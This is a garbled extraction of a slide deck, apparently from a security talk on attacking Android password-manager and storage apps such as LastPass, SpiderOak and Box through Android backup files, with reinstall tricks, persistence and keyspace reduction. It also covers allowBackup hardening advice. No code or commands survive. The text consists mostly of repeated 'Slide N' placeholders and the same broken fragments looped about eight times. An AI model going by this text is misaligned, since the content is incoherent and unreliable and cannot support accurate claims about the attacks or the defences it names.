

automatıon


Pythontothe rescue


ab_unpackerpy



ab_packerpy



Makes 0wning things


200 quicker

1000 funner

oo

oo


Bonus

n0t a bug





exploit










METHOD

1


Reinstall flag




METHOD

2


Uninstall Reinstall





exploit


derpppp

derp

DerpderpDERPDE

RPderp

derp

Derpderp DE

RP

derp DerpderP


5

][ RE

VIEW



=SECURE containers


Physıcal access


Devıcesecurity


Datasecurity


51

)( ITFIX


specificissues


lastpass


spideroak


boxcom


GOODfor enterprise


Developers

Can youread this


androidallowBackup



Some devs

GET it



pref fıles


Securing Apps





androıd backup


Securing Apps




extra securıty


Extra Security



bull easy to fool

usersen

d


Users






Users



QuestionsOMFG

A Talking Horse

Bite me space boy




Slide 2

Slide 3

Slide 4

Slide 5

Slide 6

Slide 7

Slide 8

Slide 9

Slide 10

Slide 11

Slide 12

Slide 13

Slide 14


Slide 16

Slide 17

Slide 18

Slide 19

Slide 20

Slide 21

Slide 22

Slide 23

Slide 24

Slide 25

Slide 26

Slide 27

Slide 28

Slide 29

Slide 30

Slide 31

Slide 32


Slide 34

Slide 35

Slide 36

Slide 37

Slide 38

Scenario

Slide 40

Slide 41

Slide 42

Slide 43

Slide 44

Slide 45

Slide 46

Slide 47

Slide 48

Slide 49

Slide 50

Slide 51

Slide 52

Slide 53

Slide 54

Slide 55

Slide 56

Slide 57

Slide 58


Slide 60

Slide 61






Supporting Tools

Slide 68

Slide 69

Slide 70

Slide 71

Slide 72

lastpass

lastpass (2)

Slide 75

Slide 76

Slide 77

Slide 78

Slide 79

Slide 80

Slide 81

AndroidManifestxml


Slide 84

Slide 85

Slide 86

Android Backup (ab)

Slide 88

LPandroidxml

Slide 90

Slide 91

Slide 92

Slide 93

Slide 94

Theory

Proposed Attack

Slide 97

Slide 98

Slide 99

Slide 100

Slide 101

Slide 102

Slide 103

Slide 104

Slide 105

Slide 106

Slide 107

Slide 108

Slide 109

Slide 110

Easier Attack

Slide 112

Slide 113

Slide 114

Slide 115

Persistence

Slide 117

Slide 118

Slide 119

Slide 120

Slide 121

Slide 122

Slide 123

Slide 124

Slide 125

Slide 126

Slide 127

Slide 128

Slide 129

Slide 130

Slide 131

Slide 132

Slide 133

Slide 134

Slide 135

Slide 136

Slide 137

Slide 138

Slide 139

Slide 140

Slide 141

Slide 142

Slide 143

Slide 144

GOOD


Slide 147

Slide 148

Slide 149

Slide 150

Slide 151

Slide 152

Slide 153

Slide 154

Slide 155

Slide 156

Slide 157


DERP

Slide 160

Theory (2)

Slide 162

Slide 163

Slide 164

Slide 165

Slide 166

Naiumlve Attack

Slide 168

Slide 169




Slide 173

Slide 174

Slide 175

Slide 176

Slide 177

Slide 178

Slide 179

Slide 180

Adv Attack

Slide 182

Minimize keyspace

Slide 184

Slide 185

Slide 186

Slide 187

Slide 188

Slide 189

methodology

Slide 191

Slide 192

Slide 193

Slide 194

Slide 195

Slide 196

Slide 197

Slide 198

ab_unpackerpy

ab_packerpy

Slide 201

Slide 202

Slide 203

Slide 204

Slide 205

Slide 206

Slide 207

Slide 208

Slide 209

Slide 210



Slide 213

Slide 214

Reinstall flag

Slide 216

Uninstall Reinstall

Slide 218

Slide 219

Slide 220

Slide 221

Slide 222

Slide 223

Slide 224

Slide 225

Slide 226

Slide 227

Slide 228

Slide 229

Slide 230

Slide 231

Slide 232

Slide 233

Slide 234

Slide 235

Slide 236

Slide 237

androidallowBackup

Slide 239

Slide 240

Slide 241

Securing Apps

Slide 243

Securing Apps (2)

Slide 245

Extra Security

Slide 247

Users

Users (2)

Slide 250

Slide 251

Slide 252

Slide 253


Adv Attack



Minimize keyspace





herersquos one I

Made earlier


>


PROFIT


4

][Makıngit easy


methodology


















automatıon


Pythontothe rescue


ab_unpackerpy



ab_packerpy



Makes 0wning things


200 quicker

1000 funner

oo

oo


Bonus

n0t a bug





exploit










METHOD

1


Reinstall flag




METHOD

2


Uninstall Reinstall





exploit


derpppp

derp

DerpderpDERPDE

RPderp

derp

Derpderp DE

RP

derp DerpderP


5

][ RE

VIEW



=SECURE containers


Physıcal access


Devıcesecurity


Datasecurity


51

)( ITFIX


specificissues


lastpass


spideroak


boxcom


GOODfor enterprise


Developers

Can youread this


androidallowBackup



Some devs

GET it



pref fıles


Securing Apps





androıd backup


Securing Apps




extra securıty


Extra Security



bull easy to fool

usersen

d


Users






Users



QuestionsOMFG

A Talking Horse

Bite me space boy




Slide 2

Slide 3

Slide 4

Slide 5

Slide 6

Slide 7

Slide 8

Slide 9

Slide 10

Slide 11

Slide 12

Slide 13

Slide 14


Slide 16

Slide 17

Slide 18

Slide 19

Slide 20

Slide 21

Slide 22

Slide 23

Slide 24

Slide 25

Slide 26

Slide 27

Slide 28

Slide 29

Slide 30

Slide 31

Slide 32


Slide 34

Slide 35

Slide 36

Slide 37

Slide 38

Scenario

Slide 40

Slide 41

Slide 42

Slide 43

Slide 44

Slide 45

Slide 46

Slide 47

Slide 48

Slide 49

Slide 50

Slide 51

Slide 52

Slide 53

Slide 54

Slide 55

Slide 56

Slide 57

Slide 58


Slide 60

Slide 61






Supporting Tools

Slide 68

Slide 69

Slide 70

Slide 71

Slide 72

lastpass

lastpass (2)

Slide 75

Slide 76

Slide 77

Slide 78

Slide 79

Slide 80

Slide 81

AndroidManifestxml


Slide 84

Slide 85

Slide 86

Android Backup (ab)

Slide 88

LPandroidxml

Slide 90

Slide 91

Slide 92

Slide 93

Slide 94

Theory

Proposed Attack

Slide 97

Slide 98

Slide 99

Slide 100

Slide 101

Slide 102

Slide 103

Slide 104

Slide 105

Slide 106

Slide 107

Slide 108

Slide 109

Slide 110

Easier Attack

Slide 112

Slide 113

Slide 114

Slide 115

Persistence

Slide 117

Slide 118

Slide 119

Slide 120

Slide 121

Slide 122

Slide 123

Slide 124

Slide 125

Slide 126

Slide 127

Slide 128

Slide 129

Slide 130

Slide 131

Slide 132

Slide 133

Slide 134

Slide 135

Slide 136

Slide 137

Slide 138

Slide 139

Slide 140

Slide 141

Slide 142

Slide 143

Slide 144

GOOD


Slide 147

Slide 148

Slide 149

Slide 150

Slide 151

Slide 152

Slide 153

Slide 154

Slide 155

Slide 156

Slide 157


DERP

Slide 160

Theory (2)

Slide 162

Slide 163

Slide 164

Slide 165

Slide 166

Naiumlve Attack

Slide 168

Slide 169




Slide 173

Slide 174

Slide 175

Slide 176

Slide 177

Slide 178

Slide 179

Slide 180

Adv Attack

Slide 182

Minimize keyspace

Slide 184

Slide 185

Slide 186

Slide 187

Slide 188

Slide 189

methodology

Slide 191

Slide 192

Slide 193

Slide 194

Slide 195

Slide 196

Slide 197

Slide 198

ab_unpackerpy

ab_packerpy

Slide 201

Slide 202

Slide 203

Slide 204

Slide 205

Slide 206

Slide 207

Slide 208

Slide 209

Slide 210



Slide 213

Slide 214

Reinstall flag

Slide 216

Uninstall Reinstall

Slide 218

Slide 219

Slide 220

Slide 221

Slide 222

Slide 223

Slide 224

Slide 225

Slide 226

Slide 227

Slide 228

Slide 229

Slide 230

Slide 231

Slide 232

Slide 233

Slide 234

Slide 235

Slide 236

Slide 237

androidallowBackup

Slide 239

Slide 240

Slide 241

Securing Apps

Slide 243

Securing Apps (2)

Slide 245

Extra Security

Slide 247

Users

Users (2)

Slide 250

Slide 251

Slide 252

Slide 253


Minimize keyspace





herersquos one I

Made earlier


>


PROFIT


4

][Makıngit easy


methodology


















automatıon


Pythontothe rescue


ab_unpackerpy



ab_packerpy



Makes 0wning things


200 quicker

1000 funner

oo

oo


Bonus

n0t a bug





exploit










METHOD

1


Reinstall flag




METHOD

2


Uninstall Reinstall





exploit


derpppp

derp

DerpderpDERPDE

RPderp

derp

Derpderp DE

RP

derp DerpderP


5

][ RE

VIEW



=SECURE containers


Physıcal access


Devıcesecurity


Datasecurity


51

)( ITFIX


specificissues


lastpass


spideroak


boxcom


GOODfor enterprise


Developers

Can youread this


androidallowBackup



Some devs

GET it



pref fıles


Securing Apps





androıd backup


Securing Apps




extra securıty


Extra Security



bull easy to fool

usersen

d


Users






Users



QuestionsOMFG

A Talking Horse

Bite me space boy




Slide 2

Slide 3

Slide 4

Slide 5

Slide 6

Slide 7

Slide 8

Slide 9

Slide 10

Slide 11

Slide 12

Slide 13

Slide 14


Slide 16

Slide 17

Slide 18

Slide 19

Slide 20

Slide 21

Slide 22

Slide 23

Slide 24

Slide 25

Slide 26

Slide 27

Slide 28

Slide 29

Slide 30

Slide 31

Slide 32


Slide 34

Slide 35

Slide 36

Slide 37

Slide 38

Scenario

Slide 40

Slide 41

Slide 42

Slide 43

Slide 44

Slide 45

Slide 46

Slide 47

Slide 48

Slide 49

Slide 50

Slide 51

Slide 52

Slide 53

Slide 54

Slide 55

Slide 56

Slide 57

Slide 58


Slide 60

Slide 61






Supporting Tools

Slide 68

Slide 69

Slide 70

Slide 71

Slide 72

lastpass

lastpass (2)

Slide 75

Slide 76

Slide 77

Slide 78

Slide 79

Slide 80

Slide 81

AndroidManifestxml


Slide 84

Slide 85

Slide 86

Android Backup (ab)

Slide 88

LPandroidxml

Slide 90

Slide 91

Slide 92

Slide 93

Slide 94

Theory

Proposed Attack

Slide 97

Slide 98

Slide 99

Slide 100

Slide 101

Slide 102

Slide 103

Slide 104

Slide 105

Slide 106

Slide 107

Slide 108

Slide 109

Slide 110

Easier Attack

Slide 112

Slide 113

Slide 114

Slide 115

Persistence

Slide 117

Slide 118

Slide 119

Slide 120

Slide 121

Slide 122

Slide 123

Slide 124

Slide 125

Slide 126

Slide 127

Slide 128

Slide 129

Slide 130

Slide 131

Slide 132

Slide 133

Slide 134

Slide 135

Slide 136

Slide 137

Slide 138

Slide 139

Slide 140

Slide 141

Slide 142

Slide 143

Slide 144

GOOD


Slide 147

Slide 148

Slide 149

Slide 150

Slide 151

Slide 152

Slide 153

Slide 154

Slide 155

Slide 156

Slide 157


DERP

Slide 160

Theory (2)

Slide 162

Slide 163

Slide 164

Slide 165

Slide 166

Naiumlve Attack

Slide 168

Slide 169




Slide 173

Slide 174

Slide 175

Slide 176

Slide 177

Slide 178

Slide 179

Slide 180

Adv Attack

Slide 182

Minimize keyspace

Slide 184

Slide 185

Slide 186

Slide 187

Slide 188

Slide 189

methodology

Slide 191

Slide 192

Slide 193

Slide 194

Slide 195

Slide 196

Slide 197

Slide 198

ab_unpackerpy

ab_packerpy

Slide 201

Slide 202

Slide 203

Slide 204

Slide 205

Slide 206

Slide 207

Slide 208

Slide 209

Slide 210



Slide 213

Slide 214

Reinstall flag

Slide 216

Uninstall Reinstall

Slide 218

Slide 219

Slide 220

Slide 221

Slide 222

Slide 223

Slide 224

Slide 225

Slide 226

Slide 227

Slide 228

Slide 229

Slide 230

Slide 231

Slide 232

Slide 233

Slide 234

Slide 235

Slide 236

Slide 237

androidallowBackup

Slide 239

Slide 240

Slide 241

Securing Apps

Slide 243

Securing Apps (2)

Slide 245

Extra Security

Slide 247

Users

Users (2)

Slide 250

Slide 251

Slide 252

Slide 253


herersquos one I

Made earlier


>


PROFIT


4

][Makıngit easy


methodology


















automatıon


Pythontothe rescue


ab_unpackerpy



ab_packerpy



Makes 0wning things


200 quicker

1000 funner

oo

oo


Bonus

n0t a bug





exploit










METHOD

1


Reinstall flag




METHOD

2


Uninstall Reinstall





exploit


derpppp

derp

DerpderpDERPDE

RPderp

derp

Derpderp DE

RP

derp DerpderP


5

][ RE

VIEW



=SECURE containers


Physıcal access


Devıcesecurity


Datasecurity


51

)( ITFIX


specificissues


lastpass


spideroak


boxcom


GOODfor enterprise


Developers

Can youread this


androidallowBackup



Some devs

GET it



pref fıles


Securing Apps





androıd backup


Securing Apps




extra securıty


Extra Security



bull easy to fool

usersen

d


Users






Users



QuestionsOMFG

A Talking Horse

Bite me space boy




Slide 2

Slide 3

Slide 4

Slide 5

Slide 6

Slide 7

Slide 8

Slide 9

Slide 10

Slide 11

Slide 12

Slide 13

Slide 14


Slide 16

Slide 17

Slide 18

Slide 19

Slide 20

Slide 21

Slide 22

Slide 23

Slide 24

Slide 25

Slide 26

Slide 27

Slide 28

Slide 29

Slide 30

Slide 31

Slide 32


Slide 34

Slide 35

Slide 36

Slide 37

Slide 38

Scenario

Slide 40

Slide 41

Slide 42

Slide 43

Slide 44

Slide 45

Slide 46

Slide 47

Slide 48

Slide 49

Slide 50

Slide 51

Slide 52

Slide 53

Slide 54

Slide 55

Slide 56

Slide 57

Slide 58


Slide 60

Slide 61






Supporting Tools

Slide 68

Slide 69

Slide 70

Slide 71

Slide 72

lastpass

lastpass (2)

Slide 75

Slide 76

Slide 77

Slide 78

Slide 79

Slide 80

Slide 81

AndroidManifestxml


Slide 84

Slide 85

Slide 86

Android Backup (ab)

Slide 88

LPandroidxml

Slide 90

Slide 91

Slide 92

Slide 93

Slide 94

Theory

Proposed Attack

Slide 97

Slide 98

Slide 99

Slide 100

Slide 101

Slide 102

Slide 103

Slide 104

Slide 105

Slide 106

Slide 107

Slide 108

Slide 109

Slide 110

Easier Attack

Slide 112

Slide 113

Slide 114

Slide 115

Persistence

Slide 117

Slide 118

Slide 119

Slide 120

Slide 121

Slide 122

Slide 123

Slide 124

Slide 125

Slide 126

Slide 127

Slide 128

Slide 129

Slide 130

Slide 131

Slide 132

Slide 133

Slide 134

Slide 135

Slide 136

Slide 137

Slide 138

Slide 139

Slide 140

Slide 141

Slide 142

Slide 143

Slide 144

GOOD


Slide 147

Slide 148

Slide 149

Slide 150

Slide 151

Slide 152

Slide 153

Slide 154

Slide 155

Slide 156

Slide 157


DERP

Slide 160

Theory (2)

Slide 162

Slide 163

Slide 164

Slide 165

Slide 166

Naiumlve Attack

Slide 168

Slide 169




Slide 173

Slide 174

Slide 175

Slide 176

Slide 177

Slide 178

Slide 179

Slide 180

Adv Attack

Slide 182

Minimize keyspace

Slide 184

Slide 185

Slide 186

Slide 187

Slide 188

Slide 189

methodology

Slide 191

Slide 192

Slide 193

Slide 194

Slide 195

Slide 196

Slide 197

Slide 198

ab_unpackerpy

ab_packerpy

Slide 201

Slide 202

Slide 203

Slide 204

Slide 205

Slide 206

Slide 207

Slide 208

Slide 209

Slide 210



Slide 213

Slide 214

Reinstall flag

Slide 216

Uninstall Reinstall

Slide 218

Slide 219

Slide 220

Slide 221

Slide 222

Slide 223

Slide 224

Slide 225

Slide 226

Slide 227

Slide 228

Slide 229

Slide 230

Slide 231

Slide 232

Slide 233

Slide 234

Slide 235

Slide 236

Slide 237

androidallowBackup

Slide 239

Slide 240

Slide 241

Securing Apps

Slide 243

Securing Apps (2)

Slide 245

Extra Security

Slide 247

Users

Users (2)

Slide 250

Slide 251

Slide 252

Slide 253


>


PROFIT


4

][Makıngit easy


methodology


















automatıon


Pythontothe rescue


ab_unpackerpy



ab_packerpy



Makes 0wning things


200 quicker

1000 funner

oo

oo


Bonus

n0t a bug





exploit










METHOD

1


Reinstall flag




METHOD

2


Uninstall Reinstall





exploit


derpppp

derp

DerpderpDERPDE

RPderp

derp

Derpderp DE

RP

derp DerpderP


5

][ RE

VIEW



=SECURE containers


Physıcal access


Devıcesecurity


Datasecurity


51

)( ITFIX


specificissues


lastpass


spideroak


boxcom


GOODfor enterprise


Developers

Can youread this


androidallowBackup



Some devs

GET it



pref fıles


Securing Apps





androıd backup


Securing Apps




extra securıty


Extra Security



bull easy to fool

usersen

d


Users






Users



QuestionsOMFG

A Talking Horse

Bite me space boy




Slide 2

Slide 3

Slide 4

Slide 5

Slide 6

Slide 7

Slide 8

Slide 9

Slide 10

Slide 11

Slide 12

Slide 13

Slide 14


Slide 16

Slide 17

Slide 18

Slide 19

Slide 20

Slide 21

Slide 22

Slide 23

Slide 24

Slide 25

Slide 26

Slide 27

Slide 28

Slide 29

Slide 30

Slide 31

Slide 32


Slide 34

Slide 35

Slide 36

Slide 37

Slide 38

Scenario

Slide 40

Slide 41

Slide 42

Slide 43

Slide 44

Slide 45

Slide 46

Slide 47

Slide 48

Slide 49

Slide 50

Slide 51

Slide 52

Slide 53

Slide 54

Slide 55

Slide 56

Slide 57

Slide 58


Slide 60

Slide 61






Supporting Tools

Slide 68

Slide 69

Slide 70

Slide 71

Slide 72

lastpass

lastpass (2)

Slide 75

Slide 76

Slide 77

Slide 78

Slide 79

Slide 80

Slide 81

AndroidManifestxml


Slide 84

Slide 85

Slide 86

Android Backup (ab)

Slide 88

LPandroidxml

Slide 90

Slide 91

Slide 92

Slide 93

Slide 94

Theory

Proposed Attack

Slide 97

Slide 98

Slide 99

Slide 100

Slide 101

Slide 102

Slide 103

Slide 104

Slide 105

Slide 106

Slide 107

Slide 108

Slide 109

Slide 110

Easier Attack

Slide 112

Slide 113

Slide 114

Slide 115

Persistence

Slide 117

Slide 118

Slide 119

Slide 120

Slide 121

Slide 122

Slide 123

Slide 124

Slide 125

Slide 126

Slide 127

Slide 128

Slide 129

Slide 130

Slide 131

Slide 132

Slide 133

Slide 134

Slide 135

Slide 136

Slide 137

Slide 138

Slide 139

Slide 140

Slide 141

Slide 142

Slide 143

Slide 144

GOOD


Slide 147

Slide 148

Slide 149

Slide 150

Slide 151

Slide 152

Slide 153

Slide 154

Slide 155

Slide 156

Slide 157


DERP

Slide 160

Theory (2)

Slide 162

Slide 163

Slide 164

Slide 165

Slide 166

Naiumlve Attack

Slide 168

Slide 169




Slide 173

Slide 174

Slide 175

Slide 176

Slide 177

Slide 178

Slide 179

Slide 180

Adv Attack

Slide 182

Minimize keyspace

Slide 184

Slide 185

Slide 186

Slide 187

Slide 188

Slide 189

methodology

Slide 191

Slide 192

Slide 193

Slide 194

Slide 195

Slide 196

Slide 197

Slide 198

ab_unpackerpy

ab_packerpy

Slide 201

Slide 202

Slide 203

Slide 204

Slide 205

Slide 206

Slide 207

Slide 208

Slide 209

Slide 210



Slide 213

Slide 214

Reinstall flag

Slide 216

Uninstall Reinstall

Slide 218

Slide 219

Slide 220

Slide 221

Slide 222

Slide 223

Slide 224

Slide 225

Slide 226

Slide 227

Slide 228

Slide 229

Slide 230

Slide 231

Slide 232

Slide 233

Slide 234

Slide 235

Slide 236

Slide 237

androidallowBackup

Slide 239

Slide 240

Slide 241

Securing Apps

Slide 243

Securing Apps (2)

Slide 245

Extra Security

Slide 247

Users

Users (2)

Slide 250

Slide 251

Slide 252

Slide 253


PROFIT


4

][Makıngit easy


methodology


















automatıon


Pythontothe rescue


ab_unpackerpy



ab_packerpy



Makes 0wning things


200 quicker

1000 funner

oo

oo


Bonus

n0t a bug





exploit










METHOD

1


Reinstall flag




METHOD

2


Uninstall Reinstall





exploit


derpppp

derp

DerpderpDERPDE

RPderp

derp

Derpderp DE

RP

derp DerpderP


5

][ RE

VIEW



=SECURE containers


Physıcal access


Devıcesecurity


Datasecurity


51

)( ITFIX


specificissues


lastpass


spideroak


boxcom


GOODfor enterprise


Developers

Can youread this


androidallowBackup



Some devs

GET it



pref fıles


Securing Apps





androıd backup


Securing Apps




extra securıty


Extra Security



bull easy to fool

usersen

d


Users






Users



QuestionsOMFG

A Talking Horse

Bite me space boy




Slide 2

Slide 3

Slide 4

Slide 5

Slide 6

Slide 7

Slide 8

Slide 9

Slide 10

Slide 11

Slide 12

Slide 13

Slide 14


Slide 16

Slide 17

Slide 18

Slide 19

Slide 20

Slide 21

Slide 22

Slide 23

Slide 24

Slide 25

Slide 26

Slide 27

Slide 28

Slide 29

Slide 30

Slide 31

Slide 32


Slide 34

Slide 35

Slide 36

Slide 37

Slide 38

Scenario

Slide 40

Slide 41

Slide 42

Slide 43

Slide 44

Slide 45

Slide 46

Slide 47

Slide 48

Slide 49

Slide 50

Slide 51

Slide 52

Slide 53

Slide 54

Slide 55

Slide 56

Slide 57

Slide 58


Slide 60

Slide 61






Supporting Tools

Slide 68

Slide 69

Slide 70

Slide 71

Slide 72

lastpass

lastpass (2)

Slide 75

Slide 76

Slide 77

Slide 78

Slide 79

Slide 80

Slide 81

AndroidManifestxml


Slide 84

Slide 85

Slide 86

Android Backup (ab)

Slide 88

LPandroidxml

Slide 90

Slide 91

Slide 92

Slide 93

Slide 94

Theory

Proposed Attack

Slide 97

Slide 98

Slide 99

Slide 100

Slide 101

Slide 102

Slide 103

Slide 104

Slide 105

Slide 106

Slide 107

Slide 108

Slide 109

Slide 110

Easier Attack

Slide 112

Slide 113

Slide 114

Slide 115

Persistence

Slide 117

Slide 118

Slide 119

Slide 120

Slide 121

Slide 122

Slide 123

Slide 124

Slide 125

Slide 126

Slide 127

Slide 128

Slide 129

Slide 130

Slide 131

Slide 132

Slide 133

Slide 134

Slide 135

Slide 136

Slide 137

Slide 138

Slide 139

Slide 140

Slide 141

Slide 142

Slide 143

Slide 144

GOOD


Slide 147

Slide 148

Slide 149

Slide 150

Slide 151

Slide 152

Slide 153

Slide 154

Slide 155

Slide 156

Slide 157


DERP

Slide 160

Theory (2)

Slide 162

Slide 163

Slide 164

Slide 165

Slide 166

Naiumlve Attack

Slide 168

Slide 169




Slide 173

Slide 174

Slide 175

Slide 176

Slide 177

Slide 178

Slide 179

Slide 180

Adv Attack

Slide 182

Minimize keyspace

Slide 184

Slide 185

Slide 186

Slide 187

Slide 188

Slide 189

methodology

Slide 191

Slide 192

Slide 193

Slide 194

Slide 195

Slide 196

Slide 197

Slide 198

ab_unpackerpy

ab_packerpy

Slide 201

Slide 202

Slide 203

Slide 204

Slide 205

Slide 206

Slide 207

Slide 208

Slide 209

Slide 210



Slide 213

Slide 214

Reinstall flag

Slide 216

Uninstall Reinstall

Slide 218

Slide 219

Slide 220

Slide 221

Slide 222

Slide 223

Slide 224

Slide 225

Slide 226

Slide 227

Slide 228

Slide 229

Slide 230

Slide 231

Slide 232

Slide 233

Slide 234

Slide 235

Slide 236

Slide 237

androidallowBackup

Slide 239

Slide 240

Slide 241

Securing Apps

Slide 243

Securing Apps (2)

Slide 245

Extra Security

Slide 247

Users

Users (2)

Slide 250

Slide 251

Slide 252

Slide 253


4

][Makıngit easy


methodology


















automatıon


Pythontothe rescue


ab_unpackerpy



ab_packerpy



Makes 0wning things


200 quicker

1000 funner

oo

oo


Bonus

n0t a bug





exploit










METHOD

1


Reinstall flag




METHOD

2


Uninstall Reinstall





exploit


derpppp

derp

DerpderpDERPDE

RPderp

derp

Derpderp DE

RP

derp DerpderP


5

][ RE

VIEW



=SECURE containers


Physıcal access


Devıcesecurity


Datasecurity


51

)( ITFIX


specificissues


lastpass


spideroak


boxcom


GOODfor enterprise


Developers

Can youread this


androidallowBackup



Some devs

GET it



pref fıles


Securing Apps





androıd backup


Securing Apps




extra securıty


Extra Security



bull easy to fool

usersen

d


Users






Users



QuestionsOMFG

A Talking Horse

Bite me space boy




Slide 2

Slide 3

Slide 4

Slide 5

Slide 6

Slide 7

Slide 8

Slide 9

Slide 10

Slide 11

Slide 12

Slide 13

Slide 14


Slide 16

Slide 17

Slide 18

Slide 19

Slide 20

Slide 21

Slide 22

Slide 23

Slide 24

Slide 25

Slide 26

Slide 27

Slide 28

Slide 29

Slide 30

Slide 31

Slide 32


Slide 34

Slide 35

Slide 36

Slide 37

Slide 38

Scenario

Slide 40

Slide 41

Slide 42

Slide 43

Slide 44

Slide 45

Slide 46

Slide 47

Slide 48

Slide 49

Slide 50

Slide 51

Slide 52

Slide 53

Slide 54

Slide 55

Slide 56

Slide 57

Slide 58


Slide 60

Slide 61






Supporting Tools

Slide 68

Slide 69

Slide 70

Slide 71

Slide 72

lastpass

lastpass (2)

Slide 75

Slide 76

Slide 77

Slide 78

Slide 79

Slide 80

Slide 81

AndroidManifestxml


Slide 84

Slide 85

Slide 86

Android Backup (ab)

Slide 88

LPandroidxml

Slide 90

Slide 91

Slide 92

Slide 93

Slide 94

Theory

Proposed Attack

Slide 97

Slide 98

Slide 99

Slide 100

Slide 101

Slide 102

Slide 103

Slide 104

Slide 105

Slide 106

Slide 107

Slide 108

Slide 109

Slide 110

Easier Attack

Slide 112

Slide 113

Slide 114

Slide 115

Persistence

Slide 117

Slide 118

Slide 119

Slide 120

Slide 121

Slide 122

Slide 123

Slide 124

Slide 125

Slide 126

Slide 127

Slide 128

Slide 129

Slide 130

Slide 131

Slide 132

Slide 133

Slide 134

Slide 135

Slide 136

Slide 137

Slide 138

Slide 139

Slide 140

Slide 141

Slide 142

Slide 143

Slide 144

GOOD


Slide 147

Slide 148

Slide 149

Slide 150

Slide 151

Slide 152

Slide 153

Slide 154

Slide 155

Slide 156

Slide 157


DERP

Slide 160

Theory (2)

Slide 162

Slide 163

Slide 164

Slide 165

Slide 166

Naiumlve Attack

Slide 168

Slide 169




Slide 173

Slide 174

Slide 175

Slide 176

Slide 177

Slide 178

Slide 179

Slide 180

Adv Attack

Slide 182

Minimize keyspace

Slide 184

Slide 185

Slide 186

Slide 187

Slide 188

Slide 189

methodology

Slide 191

Slide 192

Slide 193

Slide 194

Slide 195

Slide 196

Slide 197

Slide 198

ab_unpackerpy

ab_packerpy

Slide 201

Slide 202

Slide 203

Slide 204

Slide 205

Slide 206

Slide 207

Slide 208

Slide 209

Slide 210



Slide 213

Slide 214

Reinstall flag

Slide 216

Uninstall Reinstall

Slide 218

Slide 219

Slide 220

Slide 221

Slide 222

Slide 223

Slide 224

Slide 225

Slide 226

Slide 227

Slide 228

Slide 229

Slide 230

Slide 231

Slide 232

Slide 233

Slide 234

Slide 235

Slide 236

Slide 237

androidallowBackup

Slide 239

Slide 240

Slide 241

Securing Apps

Slide 243

Securing Apps (2)

Slide 245

Extra Security

Slide 247

Users

Users (2)

Slide 250

Slide 251

Slide 252

Slide 253


methodology


















automatıon


Pythontothe rescue


ab_unpackerpy



ab_packerpy



Makes 0wning things


200 quicker

1000 funner

oo

oo


Bonus

n0t a bug





exploit










METHOD

1


Reinstall flag




METHOD

2


Uninstall Reinstall





exploit


derpppp

derp

DerpderpDERPDE

RPderp

derp

Derpderp DE

RP

derp DerpderP


5

][ RE

VIEW



=SECURE containers


Physıcal access


Devıcesecurity


Datasecurity


51

)( ITFIX


specificissues


lastpass


spideroak


boxcom


GOODfor enterprise


Developers

Can youread this


androidallowBackup



Some devs

GET it



pref fıles


Securing Apps





androıd backup


Securing Apps




extra securıty


Extra Security



bull easy to fool

usersen

d


Users






Users



QuestionsOMFG

A Talking Horse

Bite me space boy




Slide 2

Slide 3

Slide 4

Slide 5

Slide 6

Slide 7

Slide 8

Slide 9

Slide 10

Slide 11

Slide 12

Slide 13

Slide 14


Slide 16

Slide 17

Slide 18

Slide 19

Slide 20

Slide 21

Slide 22

Slide 23

Slide 24

Slide 25

Slide 26

Slide 27

Slide 28

Slide 29

Slide 30

Slide 31

Slide 32


Slide 34

Slide 35

Slide 36

Slide 37

Slide 38

Scenario

Slide 40

Slide 41

Slide 42

Slide 43

Slide 44

Slide 45

Slide 46

Slide 47

Slide 48

Slide 49

Slide 50

Slide 51

Slide 52

Slide 53

Slide 54

Slide 55

Slide 56

Slide 57

Slide 58


Slide 60

Slide 61






Supporting Tools

Slide 68

Slide 69

Slide 70

Slide 71

Slide 72

lastpass

lastpass (2)

Slide 75

Slide 76

Slide 77

Slide 78

Slide 79

Slide 80

Slide 81

AndroidManifestxml


Slide 84

Slide 85

Slide 86

Android Backup (ab)

Slide 88

LPandroidxml

Slide 90

Slide 91

Slide 92

Slide 93

Slide 94

Theory

Proposed Attack

Slide 97

Slide 98

Slide 99

Slide 100

Slide 101

Slide 102

Slide 103

Slide 104

Slide 105

Slide 106

Slide 107

Slide 108

Slide 109

Slide 110

Easier Attack

Slide 112

Slide 113

Slide 114

Slide 115

Persistence

Slide 117

Slide 118

Slide 119

Slide 120

Slide 121

Slide 122

Slide 123

Slide 124

Slide 125

Slide 126

Slide 127

Slide 128

Slide 129

Slide 130

Slide 131

Slide 132

Slide 133

Slide 134

Slide 135

Slide 136

Slide 137

Slide 138

Slide 139

Slide 140

Slide 141

Slide 142

Slide 143

Slide 144

GOOD


Slide 147

Slide 148

Slide 149

Slide 150

Slide 151

Slide 152

Slide 153

Slide 154

Slide 155

Slide 156

Slide 157


DERP

Slide 160

Theory (2)

Slide 162

Slide 163

Slide 164

Slide 165

Slide 166

Naiumlve Attack

Slide 168

Slide 169




Slide 173

Slide 174

Slide 175

Slide 176

Slide 177

Slide 178

Slide 179

Slide 180

Adv Attack

Slide 182

Minimize keyspace

Slide 184

Slide 185

Slide 186

Slide 187

Slide 188

Slide 189

methodology

Slide 191

Slide 192

Slide 193

Slide 194

Slide 195

Slide 196

Slide 197

Slide 198

ab_unpackerpy

ab_packerpy

Slide 201

Slide 202

Slide 203

Slide 204

Slide 205

Slide 206

Slide 207

Slide 208

Slide 209

Slide 210



Slide 213

Slide 214

Reinstall flag

Slide 216

Uninstall Reinstall

Slide 218

Slide 219

Slide 220

Slide 221

Slide 222

Slide 223

Slide 224

Slide 225

Slide 226

Slide 227

Slide 228

Slide 229

Slide 230

Slide 231

Slide 232

Slide 233

Slide 234

Slide 235

Slide 236

Slide 237

androidallowBackup

Slide 239

Slide 240

Slide 241

Securing Apps

Slide 243

Securing Apps (2)

Slide 245

Extra Security

Slide 247

Users

Users (2)

Slide 250

Slide 251

Slide 252

Slide 253
















automatıon


Pythontothe rescue


ab_unpackerpy



ab_packerpy



Makes 0wning things


200 quicker

1000 funner

oo

oo


Bonus

n0t a bug





exploit










METHOD

1


Reinstall flag




METHOD

2


Uninstall Reinstall





exploit


derpppp

derp

DerpderpDERPDE

RPderp

derp

Derpderp DE

RP

derp DerpderP


5

][ RE

VIEW



=SECURE containers


Physıcal access


Devıcesecurity


Datasecurity


51

)( ITFIX


specificissues


lastpass


spideroak


boxcom


GOODfor enterprise


Developers

Can youread this


androidallowBackup



Some devs

GET it



pref fıles


Securing Apps





androıd backup


Securing Apps




extra securıty


Extra Security



bull easy to fool

usersen

d


Users






Users



QuestionsOMFG

A Talking Horse

Bite me space boy




Slide 2

Slide 3

Slide 4

Slide 5

